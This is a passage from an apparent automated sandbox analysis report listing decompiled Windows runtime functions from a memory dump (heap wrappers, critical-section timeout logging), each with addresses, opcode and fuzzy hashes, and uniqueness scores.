					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                0x04f9d38a
                                                                                                                                0x04f9d39b
                                                                                                                                0x04f9d3b1
                                                                                                                                0x00000000
                                                                                                                                0x04f9d3b6
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                • Instruction ID: e29938eda069be9360415bfb63ddba1b4c14378bf6c656270d1828043d69819f
                                                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                • Instruction Fuzzy Hash: 7DE08C32281244ABEB226E44CC00F797B969B407A5F204031BE085A690C679BC92E6C4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1A185, Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F1A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4fd67e4 >= 0xa) {
					if(_t5 < 0x4fd6800 || _t5 >= 0x4fd6900) {
						return L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04F00010(0x4fd67e0, _t5);
				}
			}





                                                                                                                                0x04f1a190
                                                                                                                                0x04f1a1a6
                                                                                                                                0x04f1a1c2
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1a192
                                                                                                                                0x04f1a192
                                                                                                                                0x04f1a19f
                                                                                                                                0x04f1a19f

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7881708892d6667d4122ce64368c2d5c6947eddbc7cfa5e1e919b9b6c85afa6c
                                                                                                                                • Instruction ID: 7a52c39291d6c75be211384ecfeef2062e1aead527f0147edf26d5076f41fdbf
                                                                                                                                • Opcode Fuzzy Hash: 7881708892d6667d4122ce64368c2d5c6947eddbc7cfa5e1e919b9b6c85afa6c
                                                                                                                                • Instruction Fuzzy Hash: 68D02E216A20841AF72C2710BC24B213223EBC072CF348C0DF103AA9F1EE68FCD3A508
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F116E0, Relevance: .0, Instructions: 17COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F116E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04F11710(0x4fd67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04F04620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                                0x04f116e8
                                                                                                                                0x04f116ef
                                                                                                                                0x04f116f3
                                                                                                                                0x04f116fe
                                                                                                                                0x00000000
                                                                                                                                0x04f11700
                                                                                                                                0x04f1170d
                                                                                                                                0x04f1170d
                                                                                                                                0x04f116f2
                                                                                                                                0x04f116f2
                                                                                                                                0x04f116f2
                                                                                                                                0x04f116f2

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ae82f61052594a5533891d80f4a536dd684a923f484a536bc5ad3da559556fd
                                                                                                                                • Instruction ID: 63a6e485bf328bd089691f9ca55f321eb3937e8cf3359e926ddea20747ec22e7
                                                                                                                                • Opcode Fuzzy Hash: 5ae82f61052594a5533891d80f4a536dd684a923f484a536bc5ad3da559556fd
                                                                                                                                • Instruction Fuzzy Hash: 63D0A73124010192FB2D5B109E14B143252DBC4789F38005CF307594E1CFA6FC93E448
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F653CA, Relevance: .0, Instructions: 16COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F653CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04EFEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                                                0x04f653ca
                                                                                                                                0x04f653ce
                                                                                                                                0x04f653d9
                                                                                                                                0x04f653de
                                                                                                                                0x04f653e1
                                                                                                                                0x04f653e1
                                                                                                                                0x04f653e6
                                                                                                                                0x04f653f3
                                                                                                                                0x00000000
                                                                                                                                0x04f653f8
                                                                                                                                0x04f653fb

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                • Instruction ID: 61776cce116ffd8343434cc911601a5b4ce6d199d7e93aea753ffc8f468d9369
                                                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                • Instruction Fuzzy Hash: 0AE08C31A00680ABCF12EB4CCA50F4EB7F6FB84B40F140044A0096F661C624FC01CB00
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F135A1, Relevance: .0, Instructions: 12COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F135A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04EFEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                                0x04f135a1
                                                                                                                                0x04f135a1
                                                                                                                                0x04f135a5
                                                                                                                                0x04f135ab
                                                                                                                                0x04f135ab
                                                                                                                                0x04f135b5
                                                                                                                                0x00000000
                                                                                                                                0x04f135c1
                                                                                                                                0x04f135b7

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                • Instruction ID: 645885a81dd006b3fc75b3b5d033fc4f1110126e97e54781892dda7af363f6bc
                                                                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                • Instruction Fuzzy Hash: 14D0A9329111829EFB11AB10C61876837B3BB00B08F982065C8030687AC33A6A0BD602
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EFAAB0, Relevance: .0, Instructions: 12COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EFAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                                0x04efaab6
                                                                                                                                0x04efaabb
                                                                                                                                0x04f4a442
                                                                                                                                0x00000000
                                                                                                                                0x04f4a448
                                                                                                                                0x04f4a454
                                                                                                                                0x04f4a454
                                                                                                                                0x04efaac1
                                                                                                                                0x04efaac1
                                                                                                                                0x04efaac6
                                                                                                                                0x04efaac6

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                • Instruction ID: 1a46456aa55cfbac2d34c749faa9dd7da5c7a21a9c0f8313ca9319f1ab37050b
                                                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                • Instruction Fuzzy Hash: 8ED0E935752D80CFD717CF1DC954B1677A4BB44B44FC504A0E545CBB61E62CE945CA10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F6A537, Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F6A537(intOrPtr _a4, intOrPtr _a8) {

				return L04F08E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                0x04f6a553

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                • Instruction ID: ab1774dc9fc7b20ecde490a2c7614c888e09d7c7d4e0fd482309bc4e5d68009f
                                                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                • Instruction Fuzzy Hash: ECC01232080648BBCB126E81CC00F067F2AEB94BA0F008010FA080A5A08632E9B1EA84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEDB40, Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EEDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04F04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                0x04eedb4d
                                                                                                                                0x04eedb54
                                                                                                                                0x04eedb5f
                                                                                                                                0x04eedb56
                                                                                                                                0x04eedb56
                                                                                                                                0x04eedb5c
                                                                                                                                0x04eedb5c

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                • Instruction ID: 7330490c9418fcb1c587289260bbbc58c9f53f4a899a6b00ae18533dd1f01ce2
                                                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                • Instruction Fuzzy Hash: 9FC08C30290E01AAEB221F20CE01F1076A1BB40B09F4400A06300DA0F0EB78E802EA00
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEAD30, Relevance: .0, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EEAD30(intOrPtr _a4) {

				return L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                0x04eead49

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                • Instruction ID: 069836561175ef2eb90a6a6dfeef17c901e4cfada9858521e339bb47b9acefd3
                                                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                • Instruction Fuzzy Hash: 16C08C32180288BBC7126A45CD00F017B69E790BA0F004020B6040A6A28932F861E588
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EF76E2, Relevance: .0, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EF76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                                                0x04ef76e4
                                                                                                                                0x00000000
                                                                                                                                0x04ef76f8
                                                                                                                                0x04ef76fd

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                • Instruction ID: d333b0d37f2b9dc8353344a45307a4bee2bc360f7b4aab6e3d498513e1883808
                                                                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                • Instruction Fuzzy Hash: 0CC08C702411C05AEB2A7B08CE20B203690AB0870CF4915ACAB01094E2D378B803C248
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F136CC, Relevance: .0, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F136CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                0x04f136d2
                                                                                                                                0x04f136e8
                                                                                                                                0x04f136d4
                                                                                                                                0x04f136e5
                                                                                                                                0x04f136e5

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                • Instruction ID: e7991af489384d2d3cafffc584dd1df810235a3d5ba8438b56d7e06af3ccea18
                                                                                                                                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                • Instruction Fuzzy Hash: 72C09B75155840FBF7155F30CE51F15B254F740A75F6407647321495F0E569BC01F504
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F03A1C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F03A1C(intOrPtr _a4) {
				void* _t5;

				return L04F04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                0x04f03a35

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                • Instruction ID: bc71a61857ba9dc1847dfe9040f994bb136ade93c8060950b141bbc45ffcfc61
                                                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                • Instruction Fuzzy Hash: 56C04C32180648BBD7126E45DD01F15BB69E794B60F154021B7040A5A19576ED61E998
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F07D50, Relevance: .0, Instructions: 7COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F07D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                0x04f07d56
                                                                                                                                0x04f07d5b
                                                                                                                                0x04f07d60
                                                                                                                                0x04f07d5d
                                                                                                                                0x04f07d5d
                                                                                                                                0x04f07d5d

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                • Instruction ID: b53931a8fe91b5f0d26880b369a956ba9e3130794ee87d58fbd5d2e4a7ced673
                                                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                • Instruction Fuzzy Hash: E4B092343029408FCF16EF18C080B1533E4BB84A40B8440D0E800CBA20D229F9009900
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F12ACB, Relevance: .0, Instructions: 5COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F12ACB() {
				void* _t5;

				return E04EFEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                                                0x04f12adc

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                • Instruction ID: 2098add01b64fc5961eb4abca648ca471332b5f86ccda98bfc6214d061996d3e
                                                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                • Instruction Fuzzy Hash: 51B01232C20440CFCF12EF44CA10B197332FB00750F054490910167930C228BC01CB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 53%
                                                                                                                                			E04F7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04F2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04F75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04F75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                0x04f7fdda
                                                                                                                                0x04f7fde2
                                                                                                                                0x04f7fde5
                                                                                                                                0x04f7fdec
                                                                                                                                0x04f7fdfa
                                                                                                                                0x04f7fdff
                                                                                                                                0x04f7fe0a
                                                                                                                                0x04f7fe0f
                                                                                                                                0x04f7fe17
                                                                                                                                0x04f7fe1e
                                                                                                                                0x04f7fe19
                                                                                                                                0x04f7fe19
                                                                                                                                0x04f7fe19
                                                                                                                                0x04f7fe20
                                                                                                                                0x04f7fe21
                                                                                                                                0x04f7fe22
                                                                                                                                0x04f7fe25
                                                                                                                                0x04f7fe40

                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F7FDFA
                                                                                                                                Strings
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F7FE01
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F7FE2B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                                • Opcode ID: c6f43142be94b56f2116a7cddaa5328bbbde85f74cea264fd3656dc3517e3521
                                                                                                                                • Instruction ID: 22a51041ee4e094a488f5094cdece69aabf306df5bc404ec00ec546db6a67519
                                                                                                                                • Opcode Fuzzy Hash: c6f43142be94b56f2116a7cddaa5328bbbde85f74cea264fd3656dc3517e3521
                                                                                                                                • Instruction Fuzzy Hash: 63F0F632600601BFE6241A55DC02F23BB6AEB44730F140355F628565D1EA62F82296F4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%